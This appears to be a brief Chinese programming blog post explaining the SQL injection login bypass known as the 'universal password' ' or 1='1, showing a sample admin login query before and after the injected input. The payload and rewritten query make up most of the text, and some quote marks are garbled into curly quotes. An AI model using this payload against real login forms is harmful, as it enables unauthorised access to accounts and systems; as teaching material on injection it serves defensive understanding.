1. 程式人生 > >SQL萬能密碼:' or 1='1

SQL萬能密碼:' or 1='1

SQL萬能密碼:’ or 1='1

select name,pass from tbAdmin where name=‘admin’ and pass=‘123456’

輸入使用者名稱:’ or 1=‘1
SQL變成下面這個樣子:
select name,pass from tbAdmin where name=’’ or 1=‘1’ and pass=‘123456’
1=‘1’ 永遠為真,所以就驗證通過了。